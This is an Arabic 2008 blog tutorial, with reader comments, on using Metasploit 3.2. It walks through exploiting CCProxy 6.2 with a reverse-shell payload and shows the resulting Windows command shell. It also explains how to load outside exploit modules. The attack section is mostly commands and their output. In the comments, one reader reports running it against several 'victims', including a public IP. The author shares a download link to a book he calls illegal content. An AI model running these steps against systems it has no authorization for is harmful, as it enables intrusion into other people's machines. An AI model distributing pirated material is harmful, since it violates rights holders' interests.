استخدام مشروع Metasploit و شرح استغلال ثغراته بالتفصيل
كتب بتاريخ: Aug 10th, 2008 | بواسطة: عبدالمهيمن

بدأ مشروع ثغرات Metasploit في عام 2003 تقريبا و منذ ذلك الوقت حتى يومنا هذا شهد المشروع تطوّرات عديدة و ملحوظة خصوصا بعد اطلاق الاصدار 3.0 في بداية سنة 2008, يحتوي مشروع Metasploit على عدد كبير من ثغرات الأنظمة و البرامج الجاهزة للاستغلال بالاضافة للعديد من الأدوات التي تساعدنا على اكتشاف ثغرات Buffer overflow و فحص الأنظمة و الشبكات أضف الى ذلك احتوائه على قاعدة بيانات Shellcode و Opcode تساعد مكتشفي الثغرات على برمجة و كتابة استغلالاتهم بكل سهولة. و في كل اصدار جديد يضاف الى المشروع ثغرات و أدوات جديدة تجعل من ميتاسبلويت واحدا من أقوى و أسهل مشاريع الثغرات الموجودة في وقتنا هذا…
لكل شيء محاسن و مساوء قوة مشروع ميتاسبلويت و سهولة استخدامه جعلت الكثيرين من الأطفال الذين يظنون أنفسهم Hackers يستخدمه لاختراق أجهزة الآخرين و التحكم بها بتنفيذ بضعة أوامر دون أي معرفة أو فهم بالثغرة, سببها, برمجتها أو حتى كيفية استغلالها و بصراحة ترددت كثيرا عند كتابة هذا الموضوع لأن الاختراق باستخدام مشروع ميتاسبلويت سهل جدا و احترافي لدرجة أننا قد نتمكن من اختراق جميع الأجهزة الموجودة معنا على الشبكة بسهولة و بتطبيق عدة أوامر فقط! و قبل أن أبدأ يجب معرفة أن الشرح للغرض العلمي فقط! و أنا لا أشجع أحد على تجربة ما ذكر هنا خارج نطاق شبكته الخاصة أو بدون اذن مسبق من مدير الشبكة و رغم محاولتي لتفصيل أغلب الخطوات المذكوره في الشرح الا أنه ليس موجه للمبتدئين أو للأشخاص الذين لا يملكون معرفة مسبقة بهذه الأمور و لن يتم التطرق لكيفية تنصيب المشروع على الجهاز فهذه الأشياء يجب أن تكون من البديهيات, سأستخدم سطر الأوامر بشكل أساسي و التطبيق سيكون على نظام Linux توزيعة BackTrack 3 على الاصدار 3.2 من مشروع ميتاسبلويت مع العلم من الممكن تطبيق بعض ما ذكر هنا على نظام ويندوز لكني لا أنصح بذلك!
نبدأ بفتح سطر الأوامر و من ثم الذهاب للمجلد الموجود به مشروع Metasploit في توزيعة BackTrack 3 سيكون المشروع في المسار التالي:
/pentest/exploits/framework3/
بعد ذلك نقوم بتشغيل سطر أوامر مشروع Metasploit بتنفيذ الأمر:
./msfconsole
أول ما يبدأ سطر أوامر Metasploit يعطينا معلومات عن حالة المشروع مثل الاصدار, عدد الثغرات الموجودة, عدد الأدوات و الـ Payloads و غيرها من الأمور الأخرى مايهمنها حاليا الثغرات فقط و هذا ما سأشرحه هنا. لنتمكن من استغلال ثغرة Metasploit هنالك بضعة خطوات يجب القيام بها, تختلف هذه الخطوات و الخيارات من ثغرة لأخرى الا أنها متشابهة بشكل عام. أول شيء علينا تحديد الثغرة التي نريد استغلالها بعد ذلك نحدد الخيارات الخاصة بها مثل الاصدار المصاب, نظام التشغيل, الاستغلال… ثم ننفذ الثغرة و نستخدمها حسب الاستغلال المحدد في الخيارات, يوجد الكثير من الأوامر التي يمكننا استخدامها في مشروع ميتاسبلويت لمعرفتها نقوم بتنفيذ الأمر التالي:
msf > help
ما يهمنا حاليا في استغلال الثغرات هي الأوامر المظللة في الصورة
msf > show exploits
msf > info exploit
msf > use exploit
نستخدم الأمر الأول لاظهار الثغرات الموجودة في المشروع أما الثاني لاظهار معلومات مفصلة عن الثغرة و مصادر خارجية عنها و الثالث لاستخدام الثغرة و تحديد خياراتها, أول شيء ننفذ الأمر الأول لاستعراض الثغرات الموجودة في المشروع
msf > show exploits

كما هو واضح تم اظهار عدد كبير من الثغرات و بجانب كل ثغرة معلومات بسيطة عن البرنامج/النظام و الاصدار المصاب و لاظهار معلومات مفصلة عن احدى الثغرات يكفي تنفيذ الأمر info , مثال على ذلك:
msf > info windows/proxy/ccproxy_telnet_ping
بعد تنفيذ الأمر السابق سيتم اظهار كافة المعلومات المتوفرة عن الثغرة الموجودة في برنامج CCProxy الاصدار 6.2 كما هو واضح في الصورة التالية:
قبل البدء باستخدام الثغرة نلاحظ الخيارات المتوفرة لها و كما قلت سابقا تختلف الخيارات من ثغرة لأخرى لكن في هذه الثغرة يوجد لدينا خيارين أساسيين الأول هو IP السيرفر الذي يستعمل برنامج CCProxy أما الثاني فهو المنفذ الذي يستخدمه البرنامج, أيضا لا ننسى تحديد النظام فهذا شيء مهم في ثغرات Metasploit خصوصا أنظمة Windows و اصداراتها و علينا معرفة أن استغلال هذه النوعية من الثغرات دقيق جدا و صعوبة استغلالها تكمن في دقتها فأي خيار خاطئ نحدده لن يمكننا من استغلال الثغرة بشكل صحيح, الأن ننفذ الأمر use لنستخدم الثغرة
msf > use windows/proxy/ccproxy_telnet_ping
و نستخدم الأمر show لاظهار خيارات الثغرة المتوفرة
msf exploit(ccproxy_telnet_ping) > show options
نحدد الخيارات التي تناسبنا باستخدام الأمر set كما هو واضح من الصورة التالية:
أول شيء أظهرنا خيارات الثغرة باستخدام الأمر السابق ثم حددنا الخيار RHOST وهو IP الجهاز المستهدف و ذلك باستخدام الأمر:
msf exploit(ccproxy_telnet_ping) > set RHOST 192.168.0.53
بالنسبة لي كان 192.168.0.53 و أبقيت الخيار RPORT نفسه 23 و هو المنفذ الذي يستخدمه برنامج CCProxy بشكل افتراضي و طبعا يمكن تغييره بحسب المنفذ المستخدم مثلا 34 باستخدام الأمر:
msf exploit(ccproxy_telnet_ping) > set RPORT 34
بعد ذلك نقوم باظهار الأنظمة المتاحة باستخدام الأمر:
msf exploit(ccproxy_telnet_ping) > show targets
نحدد الخيار 4 و هو نظام Windows XP SP2 – English بتنفيذ:
msf exploit(ccproxy_telnet_ping) > set TARGET 4
أما الآن نظهر الاستغلالات المتاحة لهذه الثغرة باستخدام الأمر:
msf exploit(ccproxy_telnet_ping) > show payloads
بالنسبة لي سأحدد الاستغلال windows/shell_reverse_tcp و يستخدم هذا الاستغلال لانشاء اتصال عكسي مع الجهاز الذي تم تنفيذ الثغرة عليه و نتحكم بالاتصالات من داخل مشروع ميتاسبلويت
msf exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell_reverse_tcp
مع العلم من امكانية تحديد أي استغلال آخر نريد مثل تنفيذ أمر محدد على النظام, فتح منفذ و الاتصال به عن طريق أداة الـ Netcat, تحميل ملف و تشغيله أو حتى اضافة مستخدم جديد للنظام بصلاحيات Administrator, الأن ننفذ الأمر:
msf exploit(ccproxy_telnet_ping) > show options
من جديد لمراجعة الخيارات المخصصة للثغرة أو لتعديل أي خيار مثل ما هو واضح بالصورة التالية:
يمكننا الأن تحديد خيارات الاستغلال مثل LHOST وهو IP جهازنا و LPORT هو المنفذ الذي سيتم الاتصال العكسي عن طريقه بتنفيذ الأمر:
msf exploit(ccproxy_telnet_ping) > set LHOST 192.168.0.41
بالنسبة لي سأترك المنفذ 4444 نفسه دون تغيير, الأن لم يبقى علينا الا تطبيق الأمر
msf exploit(ccproxy_telnet_ping) > exploit
لتنفيذ الثغرة و اذا كانت جميع الخيارات صحيحة سيتم تنفيذ الاستغلال و لنتمكن من مشاهدة الاتصالات العكسية الموجودة ننفذ الأمر:
msf > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.0.41:23443 -> 192.168.0.53:1032
و من ثم ننفذ الأمر التالي للاتصال باحدى الاتصالات المتاحة و في هذه الحالة هو رقم 1
msf > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
مع العلم من امكانية تنفيذ أكثر من استغلال على أكثر من جهاز و الحصول على اتصالات أخرى.. أو القيام بهذه العملية بشكل أوتوماتيكي باستخدام احدى أدوات ميتاسبلويت الخطيرة و هي db_autopwn التي سأترك شرحها لموضوع آخر و طبعا يوجد الكثير من الاستغلالت الأخرى أترك تجربتها لكم.
كل ما ذكر سابقا مجرد مثال بسيط عن احدى ثغرات الميتاسبلويت لكن المشروع أقوى من ذلك بكثير و يوجد له استخدمات و ثغرات أخرى قوية قد أشرحها قريبا ان شاء الله, كل ماعليك الأن هو التجربة و اعادة المحاولة و لا تتوقع أن تتمكن من استغلال الثغرة من أول مرة أو ثاني مرة و لا حتى بعد 10 مرات كل مرة تجرب بها ثغرة ستكشف شيء جديد و خطأ قمت به و تذكر أن الدقة أهم شيء في استغلال ثغرات مشروع الميتاسبلويت فتحديد البرنامج و الاصدار المصاب أصعب من استغلال الثغرة المكتوبة له. من الجميل أيضا في مشروع ميتاسبلويت هو وجود واجهات رسومية جميلة لتسهيل التعامل مع المشروع و مخصصة للأشخاص الذين لايحبون استخدام سطر الأوامر
الواجهة الرسومية العادية GUI لتشغيلها ننفذ الأمر التالي داخل مجلد مشروع Metasploit
./msfgui
الواجهة التي تعمل من المتصفح لتشغيلها ننفذ الأمر التالي داخل مجلد المشروع
./msfweb
بعد ذلك نفتح المتصفح على الرابط
http://127.0.0.1:55555
ماذا بعد؟ لنفرض الآن أننا نريد استغلال ثغرة غير موجودة في مشروع الميتاسبلويت أحضرناها من موقع Milw0rm مثلا كيف سنضيفها؟ بصراحة وجدت الكثيرين لا يعرفون الطريقة رغم بساطتها و طبعا الشرح للينوكس و نصيحة للجميع ابتعدوا عن ويندوز في هذه الأمور, كما نعرف في الاصدار 2 السابق من مشروع Metasploit كان المشروع و ثغراته تبرمج بلغة Perl و تأتي بالامتداد pm أما في الاصدار 3 تم اعادة برمجة المشروع من جديد بلغة Ruby و تأتي الثغرة بالامتداد rb لذلك أول شيء علينا معرفة نوعية الثغرة هل هي للاصدار 3.0 أم لاصدارات سابقة 2.0 ؟ أتوقع أن الاختلاف بين الكود البرمجي بين اللغتين واضح جدا (مثال عن ثغرة للاصدار 2 – مثال عن ثغرة للاصدار 3) طبعا الشرح هنا موجه للاصدار 3.0 فهذا مانتكلم عنه في هذا الموضوع, اذا اطلعنا على كود الثغرة و ركزنا على السطر التالي:
class Exploits::Windows:: Driver::Intel_Centrino_2200BG_driver_probe < Msf::Exploit::Remote
سنعرف أن الثغرة لنظام Windows مصنفة في Driver اسمها Intel_Centrino_2200BG_driver_probe الأن كل ماعلينا هو التوجه للمجلد الموجود في المسار التالي:
/home/USER/.msf3/
طبعا مع استبدال USER باسم المستخدم عندك في نظام لينوكس و اذا لم يكن المجلد موجود يمكننا انشاؤه ببساطة! أما اذا كنت تعمل بالمستخدم root كما في توزيعة BackTrack سيكون مسار المجلد:
/root/.msf3
بعد الدخول للمجلد ننشئ مجلد جديد باسم modules بداخله مجلد آخر باسم exploits ليصبح المسار النهائي بهذا الشكل:
/home/USER/.msf3/modules/exploits
الأن ننشئ بداخل مجلد exploits مجلد باسم windows بداخله مجلد driver بعد ذلك ندخل للمجلد driver و ننشئ ملف الثغرة باسم Intel_Centrino_2200BG_driver_probe متبوعا بالامتداد .rb و بداخله كود الثغرة كامل ليصبح مسار الثغرة النهائي:
/home/USER/.msf3/modules/exploits/windows/driver/Intel_Centrino_2200BG_driver_probe.rb
جميل جدا الأن كل ماعلينا هو تشغيل سطر أوامر مشروع Metasploit من جديد و ملاحظة عدد الثغرات قبل و بعد تطبيق ما سبق و سنلاحظ وجود الثغرة ضمن قائمة الثغرات الموجودة في المشروع!
أما اذا أردنا تحديث المشروع بشكل كامل و اضافة ثغرات و أدوات جديدة.. يكفي الدخول لمجلد المشروع و من ثم تطبيق الأمر التالي:
svn update
أخيرا يرجى في حال وجود أي خطأ في الشرح تنبيهي له مهما كان بسيط فالشرح طويل نوعا ما و رغم تجريب ماذكر و محاولتي لتجنب الوقع بأي خطأ فقد أسهو أحيانا, أتمنى أن يكون الموضوع قد نال اعجابكم و يرجى عدم نقل الموضوع دون الاشارة برابط للمصدر!
كتاب: Metasploit Toolkit for Penetration Testing Exploit Development and Vulnerability Research الكتاب يحتوي على شروحات متقدمة لاستخدامات مشروع الميتاسبلويت و برمجة ثغراته بالاضافة للعديد من الأمور الأخرى, اذا كنت مهتم بالحصول على نسخة من الكتاب يمكنك شراؤه من موقع أمازون من هذه الصفحة.

تحديث2: الاستخدامات المتقدمة لمشروع ميتاسبلويت
تحديث3: شروحات فيديو عن مشروع ميتاسبلويت
تحياتي, أخوكم Br4v3-H34r7.



























سلامـ،

حلوة منك اخي عبدوو….الف شكر
اخوك النابستر المغربي
موفق حبيبي ..
السلام عليكم
الحمدلله على السلامه
يعطيك العافيه يا عبد المهيمن
شرح وافي للبرنامج واستغلال ثغراته
ان شاء الله بدخل لليونكس بعد شوي واثبته ولو اني ما استخدمت البرنامج من فتره طويله
ننظر جديدك
مشكووور جدا على الشرح الجميل
شكرًا لك أخي على هذا الشرح الوافي ,
السلام عليكم
.
موضوع جميل و منسق , طبعا أداة ال Metasploit من الادوات الاكتر انتشارا في استخداما في مجتمع ال Hackers او محبي ال Pentest و تتميز الاداة بما تتيحه للمستخدم من ال Payloads خلال تنفيد تغرة معينة بالاضافة الى امكانية تغيرها و مشروع ال Metasploit من المشاريع الناجحة و المميزة و تستحق التطوير .
تحياتي لك أخي ، واصل
شرح وافي
ربي يعيطك الف الف عاافية
تحياااتي لك
موضوع ممتاز جدا جدا
شكرا يالغالي
بس سؤال حبيبي الثغرات اللي في الميتا عبارة عن ريموت او لوكال
طيب لو فيها ثغرات ريموت حط لنا اسمها
و شكرا عالشرح
أهلا بالجميع, شكرا لتعليقاتكم و كلامكم.. نورت المدونة بوجودكم
أخي soufiane لو قرأت الموضوع ستعرف جواب سؤلك
ما شاء الله , شرح وافي وكافي , يعطيك العافية بل الذيب و واصل أبداعك
بارك الله فيك حبيبي
موضوع راائع و مفيد
تعلمت منه الكثير
اكثر ما اعجبني في الموضوع
اخر عبارة هههههه
يرجى عدم نقل الموضوع دون الاشارة برابط للمصدر!
سلاآم
موضوع جيد ويوضح للمتبدأين طريقه التعآمل معه وتقتدر بنفسك تضيف الثغرآت والأدوآت والصرآحة لل ع الويندوز جنيي وانا كل اجربه وانا ع البآك ترآك اثبت واحسن ..
وتوجد اضافات قوية مثلا اضافه الي تقتل كل عمليآت الحمآية بعد اخترآق الجهآز ..
يوجد شروحآت اجنبيه كثيرة للثغرآت هاذي ومآقصرت اخوي والله يوفقك فمآن اللهـ,
السلام عليكم ورحمة الله وبركاته
أخي عبد المهيمن , احصل على نفس الخطأ في كل ثغرة وتظهر لي هذه الرسالة
[*] Started reverse handler [-] Exploit failed: The requested address is not valid in its context. – bind(2)
, رغم أنني قد تأكدت من جميع الأوامر , علماً بأنني أستخدمه على آي بي من الشبكة ,
وشكراً
ماشاءالله عليك اخووووي مبدع ومدونة رائعة جداااا الى الامام حبيبي
بالفعل ابداع من شخص مبدع ماشاء الله ..
اخوي عبدو انا حاولت ادخل مجال الـC ومدري هل هالمجال ينفعني مع لينكس والهكر
او لا
وشاكرلم مجهودك
مرة ثانية أهلا بالجميع و شكرا على تعليقاتكم و وجودكم بالمدونة, عذرا لن أتمكن من الرد على كل واحد شخصيا لأن ماشاء الله صار العدد كبير
لذلك سأرد على الاستفسارات و بعض التعليقات فقط 
@IncLudEr: كتبت ذلك لأن مابقي موضوع في المدونة الا و تم نقله بعض الناقلين يذكر المصدر و البعض لو قدر يخفيه ماكان قصر لا تنسى الشعار على جميع الصور
مع العلم أني لا أحبذ و لا أعلم أين الفائدة من نقل المواضيع و تكرار المحتوى!
@Tokuo: أخي بهذه المعلومات البسيطة لن أستطيع مساعدتك و كما قلت في الموضوع لكل ثغرة خيارات تختلف عن الأخرى لذلك من المستحيل معرفة الخطأ بدون معلومات شاملة و لذلك يفضل أن تستخدم Google للبحث عن سبب الخطأ أو اعادة المحاولة و مراجعة الشرح فأنا لن أستطيع القيام بهذه المهمة للجميع, بالتوفيق…
@عجوز التماسيج: موفق بلغة البرمجة C أخي.. و بالهاكر لايوجد شيء لا يفيدك ستسفيد من هذه اللغة في المراحل المتقدمة هي و لغة ASM و أيضا قد تحتاج لاحدى اللغات النصية ان صح القول مثل Ruby , Perl , Python بالتوفيق…
ماشاء الله


شرح وافي منك اخي الكريم
بس اتمنى البعض ما يطبقة في اخواننا
واتمنى منك انك تواصل
سامي
بطل يا عبدو

أنا عارف أنك ما تحب تنزل شرح كامل للأختراق علشان الأطفال لكن إن شاء زوارك عاقلين
بوركت يا بطل و الله وفقك و عوزدا أحمدا
تحياتي يا بطل
السلام عليكم
أخي أنا اعرف أن لكل ثغرة خيارات تختلف عن الاخرى ولكني قد كتبت كل ثغرة بنفس الطريقة المطلوبة , إما أن تظهر هذه الرسالة
[*] Started reverse handler
[-] Exploit failed: The connection timed out
أو هذه الرسالة
[*] Started reverse handler
[-] Exploit failed: The requested address is not valid in its context. – bind(2)
وبالنسبة للثغرات هل هي قديمة ؟
وموقع ميتاسبوليت لم يعد يضع ثغرات منذ 2005 , هل اصبح يدمجها بالبرنامج أم ماذا ؟
وأنا آسف على الاسئلة الكثيرة
Crazy Pc و KING SABRI أهلا بكم نورت المدونة بوجودكم…
أخي Tokuo و الله ما ظنيت أنك تستخدم نفس الثغرة! أجل هي قديمة و للاصدار 6.2 من برنامج CCProxy و الاصدار الحالي 6.6 على ما أذكر.. أنا استخدمت هذه الثغرة لأنها بسيطة و خياراتها قليلة و لتوضيح كيفية التعامل مع المشروع فقط! و ليس لتجريبها, أصلا برنامج CCProxy غير مشهور و طبعا اذا جربتها على الاصدار 6.2 من برنامج CCProxy باذن الله ستعمل معك.. الحمد لله ماشرحت الثغرة الجديدة الموجودة بسيرفر الـ DNS BIND كان نصف المواقع طارت
بالتوفيق…
شرح جميل جدا جزاك الله خير
و ما عندي شي اقوله غير واصل ابداعك يا بطل
اخوك باذن الله skulk-Fox
إذا كنت تضن نفسك هاكرز و نحن أطفال صغار نحسب أنفسنا هاكر

فإن
لو أملك منك 2 فسوف أستعمر العالم بأكمله
ستجد الإبي بتاعتي يدل على أنني جزائري
و هو يتغير كل 30 دقيقة
حاول دخول جهازي الابتوب إذا كنت خاكر
@skulk-fox: أنت أجمل أخي
شكرا لتعليقك و أهلا بك في المدونة…
@الهاكرز: على الرغم من أن الايميل و الموقع الذي أدخلته غير حقيقي الا أني نشرت تعليقك لأوضح بعض الأشياء.. أولا أنا لم أخص أحد بكلامي فببساطة الفعل هو الذي يدل على الشخص ان كان يستحق أن يقال عنه Hacker أما لا! و تعلم الهاكر و الاختراق من أجل المعرفة بالشيء و روح التحدي شيء و استخدامه لايذاء الآخرين و اختراق أجهزتهم شيء آخر, ثانيا لا أجد أي عبقرية اذا كان IP جهازك جزائري أو أي بلد آخر فحتى لو لم تكن تستخدم الانترنت من الجزائر.. يوجد اختراع اسمه بروكسي و آخر اسمه VPN و SSH Tunnels و 1000 طريقة غيرهم تمكن أي شخص من تغيير آيبي جهازه ببساطة و أيضا يجب أن تعرف أنا لا أخترق جهاز أحد و لست محتاج لذلك و أصلا لا أملك للقيام بهذه الأمور و اذا كنت تعتبر أن هذا هو الهاكر فاسمحلي أقلك أنت مخطئ تماما!
ملاحظة: في المرة القادمة استعمل ايميل حقيقي و الا سأضطر آسفا لعدم السماح بنشر تعليقك!
السلام عليكم
شرح جميل بالرغم أني ما قرأته جيدا لكنه أفضل من الشروحات الموجودة في الساحة العربية
أظن أن مشروع ميتاسبلويت لديه مستقبل زاهر خصوصا Anti Fronsic
هناك كتاب اعجبني جدا ويشرح هذا المشروع بشكل مفصل اسمه
Metasploit Toolkit for Penetration Testing, Exploit Development, and Vulnerability Research
لذلك للذي أراد تعلمها بشكل مفصل وكامل أنصحه بهذا الكتاب طبعا لايستغني عن المستندات الخاصة بالمشروع .
تسلم أخي القلب الشجاع
السلام عليكم ورحمة الله وبركاته
الله يعطيك العافيه اخوي بس فيه حاجه لو تكرمت تشر حها لنا اضافة الثغرات في البرنامج
لقيت مثلا ثغره في موقع سكيورتي ابي اضيفها للبرنامج وشلون
@Alpha_HuNtEr: و عليكم السلام أخي.. صحيح للميتاسبلويت مستقبل زاهر ليس بالـ Anti-Forensics فقط بل بمشاريع أخرى كثيرة, الكتاب الذي ذكرته موجود عندي و هو رائع و مفصل و يحتوي على شروحات متقدمة للميتاسبلويت و برمجة ثغراتها, أهلا بك و بالتوفيق…
@حلم اصبح حقيقه: و عليكم السلام.. بصراحة مالي عارف شو بدي جاوبك.. أنت قرأت الشرح أم لا ؟ الطريقة مذكورة و مشروحة بالتفصيل!
السلآم عليكم ..
آخي الكريم
أشكرك على هذا الموضوع الجميل والشيق والنادر على مستوىآ المواقع العالميه
واحب ان اقول
بآرك الله فيك و زآد من علمك ..
سؤالي : هل استعطيع تطبيق الشرح على نظام الوندوز اكس بي ؟
أم أن هناك اختلاف في ذلك ؟
واتمنى ان تضع لي أو لنا شرح مفصلاً لتطبيق الثغرات على النظام وندوز اكس بي .
تحياتي

و عليكم السلام.. العفو أخي و ان شاء الله يكون الموضوع نال اعجابك, بالنسبة لسؤالك كما قلت في سابقا يمكن تطبيق بعض ماذكر هنا على نظام ويندوز لكن بهذه الحالة ستطبق ماذكر اما من الواجهة الرسومية أو من المتصفح و بصراحة لم أجرب ذلك و لا أضمن شيء هناك. بالتوفيق…
اخ للأسف لا افهم في الهكر
ان شاء الله اول نتعلم برمجه وبعدها يصير خير لاكن عندي سؤال : اذا عرفت للبرمجه هل اكون فهمت بعض الشيء في الهكر 
أخي بعبارة بسيطة لا يمكن للشخص أن يكون هاكر اذا لم يكن مبرمج و يعرف عدة لغات أيضا!
ابدااااااااااااع ماشاء الله عليك وزادك علم ان شاء الله
السلام عليكم
مشاء الله تبارك الرحمن
(وقل ربي زدني علما)
عندي سؤال والي هوا
هل استطيع عن طريق هذه الآداة ان اخترق آيبي خارجي يعني موشرط يكون من شبكتي يعني من النت
انا الي سمعت عنها انه يمكن ذلك
حبيت اتاكد فقط
@maximus: أخي أنت الابداع و أهلا بك في المدونة…
@Sniper Hell: و عليكم السلام .. أجل أخي طبعا يمكنك استخدام الميتاسبلويت على أيبي خارجي لكن بهذه الحالة التطبيق لن يكون على شبكتك الخاصة
و قد تعترضك عدة مشاكل مثل وجود فايروول يمنع تنفيذ الثغرة أو قد تبقى تجرب الثغرة على سيرفر لمدة ساعة بعد ذلك تستنتج أنه Honypot اسألني أنا
بالتوفيق…
اممم
يعطيك العافية
عندي سؤال
ايش الفرق بين ال
buffer
و
stack
معليش اخوي رح اتعبك معاي
الله يعافيك أخي.. جواب سؤلك تجده برابط الويكي الخاص بالـ Buffer overflow الموجود في أول الموضوع و ستجد به كل المعلومات التي تحتاجها مثل الثغرة, أسبابها و أنواعها. بالتوفيق…
شُكراً لك على هذا الشرح الممتع المفيد
بالتوفيق ان شاء الله
thanks brother

اخي العزيز بريف هرت شكرا جزيلا علي مجهودك الرائع ومدونتك الاكثر من رائعه ومواضيعك الغاية في الروعة
كنت دورت كتير جدا علي كتاب Metasploit Toolkit for Penetration Testing, Exploit Development, and Vulnerability Research بس ملقتوش مجاني غير اني ملقتوش مذكور في اي موقع عربي غير مدونتك علي جوجل
فياريت لو عندك الكتاب تنزله للافاده لاني غاية في الاحتياج لهذا الكتاب وشكرا
iCoNzZz & sub-zero: أهلا بكم في المدونة و ان شاء الله تكونوا استفدتوا من الموضوع…
@egy_st3alth: و عليكم السلام أخي.. شكرا لكلامك و بالنسبة للكتاب تم ارسال رابطه لايميلك
أتمنى لك التوفيق و أهلا بك في المدونة…
أريد ان أقول لك بأننى إكتشفت موقعك صدفة ، ورب صدفة خير من ألف موعد ، ووجدت شخصية جميلة مرتبة تشع ذكاء وعمل ، أحاول أن أقرأ كل سطر فى مدونتك حتى أستفيد من علمك ومن جهودك ، ولا يسعني إلا ان أشكرك وأتمنى لك التوفيق فى تطوير نفسك وبث العلم للناس . وشكرا لك.
السلام عليكم ورحمة الله وبركاته
الأخ العزيز Br4v3-H34r7 تشكراً جداً على مجهودك وإخلاصك في هذا المشروع الرائع بصراحة أنت من الناس النادرين والناجحين , أرجو منك التكرم ووضع أسماء كتب عربية أو مترجمة لكيفية إستغلال الثغرات سواءاً للأجهزة أم للمواقع …. لكي أستفيد لأني منذ زمن وأنا ابحث عن هذه الكتب المفيدة جداً لتطوير قدراتي في البرمجة …………….. وشكراً لك
@قارئ ومثقف: سعيد بوجودك هنا أخي.. أتمنى أن تكون استفدت من المواضيع و شكرا على الاطراء و أهلا بك في المدونة
@المحترف: و عليكم السلام.. أنت أيضا شكرا للاطراء و أهلا بك في المدونة, بالنسبة للكتب شخصيا لم أجد شيء مترجم للعربي لذلك عليك الاعتماد على المصادر الأجنبية. , و أخيرا ممكن أفهم كيف مشروع ثغرات ميتاسبلويت سيطور قدراتك في البرمجة؟!
بارك الله فيك مقال اكثر من رائع اتشرف بوضع مدونتك في مفضلتي صراحه
حبيت اسئلك بس كيف ابدأ ؟
يعني اتمرس في لنكس (باك تراك3) او اني اتعلم لغة برمجه احسلي او استمر بأستخدام البيرفست اللي اعتبره مو هكر حقيقي ومابيطور من قدراتي
أهلا بك أخي فهد في المدونة.. بالنسبة لسؤلك جوابه بسيط اذا كنت متمكن من لينوكس و تعرف كيف تتعامل مع النظام بشكل جيد فالباك تراك مناسبة جدا و ان شاء الله بتفيدك كثير أما اذا كنت مبتدئ في لينوكس ابدأ باستخدامه و اختر توزيعة بسيطة مثل أبونتو.. و طبعا البرمجة بتفيدك كثير و استحالة الواحد يصير “هاكر” اذا ماكان مبرمج و بيعرف عدة لغات لكن بالمناسبة شو هذا “البيرفست” ؟؟!
البيرفست حبيبي برنامج اختراق ترسل السيرفر ويجيك التبليغ وتخترق بدون مايون عندك اي معرفه عن الهكر وهذا انا مااسميه هكر طبعا
أهلا يعني برنامج اختراق أجهزة في نظام ويندوز هذا الي ترسل تروجان ليفتح منفذ في جهاز الضحية و تشفره بالهيكس لعدم كشفه من الأنتي فايرس
رجعتني للأيام التي كنت أستخدم بها برنامج prorat و subseven ههههههه طبعا هذا الكلام صرله أكثر من سنتين
تحياتي.
ايوه هوا هذا
اختراق المبتدئين
بس مادامك انت مريت بهذي التجربه راح امرها زيك
واصل لما وصلت به من علم
وكل عام وانتم بخير
أخي أنا لم أقل لك أنها تجربة ناجحة و مفيدة! كانت مجرد ألعاب بدأنا بها و اذا أنت تعرف أنها كذلك تخطاها و لا داعي للمرور بها فهي ليست اختراق و أفضل ما تضيع وقتك بهذه الأمور ابدأ باستخدام لينوكس و تعلم البرمجة و بعد مدة سترى أن ما تتكلم عنه حاليا مجرد ألعاب لا أكثر
بالتوفيق و رمضان مبارك ان شاء الله.
ماشاء الله تبارك الله ….!!
الله يعطيك الف عافية على الشرح وموفق ان شاء الله .!!
اخووك
][LeONaL_HaCKeR][
السلام عليكم ورحمه الله وبركاته
موضوع جميل بصراحه وطبقته حرفيا وتعلمت بعض الاساسيات مثل اختيار ثغره وكشف خياراتها
لكن ابغى الكتاب اللي ارسلته للاخ الكريم بالايميل
لاني حاب اتعلم البرنامج وماحصلته مجاني
واذا عندك مواقع لتعليم البرنامج ارجوا وضع رابط له
وزادك الله علما
LeONaL_HaCKeR & development: أهلا بكم في المدونة
أخي development بصراحة صار أكثر من واحد طلب الكتاب عن طريق الايميل و أرسلت رابط التحميل لهم.. أما الأن فلقد أضفت رابط تحميل الكتاب لنهاية الموضوع.. أتمنى أن تستفيد منه.
شررح رائع والصرااحه بسييط جدا مشرووع الميتسبليوت..
عالعمووم كفيت ووفيت اخوووي..
ويعطيك الف عافية..
يعطييك العافية اخووي بس ياليت ترفع الكتاب على موقع غير الرابيد شير..
لان محتاج الكتاب ضرووري لاهنت اخووي..
الله يعافيك أخي AbU-NaIf أتمنى أن تكون استفدت من الشرح.. بالنسبة للكتاب هو مرفوع على حسابي في موقع الربيدشير لضمان عدم حذفه لأنه يعتبر محتوى غير قانوني و لا يمكنني رفعه على سيرفر المدونة, بالتوفيق…
جزاك الله عنا خير الجزاء ونتقدر لك مجهودك وعندي طلب اذا امكن بالنسبه للكتاب ماقدرت احمله من الرابط اذا تقدر توفر رابط ثاني او ترسله على الايميل وشكرا
ماشااء الله هذا الموضوع اللي ابحث عنه من زمان
من جد شرح ولا أروع اهنيك يابطل وبارك الله فيك
السلام عليكم
حاولت اكثر من مره اطبق الشرح وطبقته اكثر من مره وعلى اكثر من ضحيه لكن في الاخير تظهر هذه الرساله
>> exploit[*] Started reverse handler
[-] Exploit failed: The connection timed out (94.97.4.240:23).
هل هذا يعني ان الثغره لا تعمل مع الضحايا ؟
سؤال اخر .. هل هناك موقع لتعليم هذا المشروع وشرح عملي لجميع ثغراته سواء باللغه العربيه ام الانجليزيه
وشكرا لك
[...] لمن يريد معلومات تفصيليّة حول كيفيّة استخدام برنامج metasplit الشهير لدى العاملين والدراسين في مجال أمن المعلومات والذي يجعل عملية الاختراق لحاسوب (يحتوي على ثغرة) عبارة عن نزهة أنصح بقراءة هذا المقال. [...]
اخي شكرا لك على مجهوداتك الرائعة الا انه يتبادر لي السؤال التالي هل الواجهة الغير الرسومية اي الشاشة السوداء هل يمكن استعمالها في نظام windows xp لانه لم اتمكن من تحقيق دلك في المقابل تظهر لي فقط الواجهة الرسومية من خلال program files ارجو التوضيح وشكرااااااااااااااااااااااااااااا
اخي اعدرني على ازاعجي ولكني ارا فيك الهكر الحقيقي واتخذك قدوة ولكن لا اعرف من اين ابدا حتى اصل الى مستواك فلقد بدات في تعلم visual basic اتمنى ان ترشدني الى الطريق الصحيح وشكرااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااا
أهلا بالجميع.. أتمنى أن يكون الموضوع نال اعجابكم واستخدام موفق ان شاء الله.
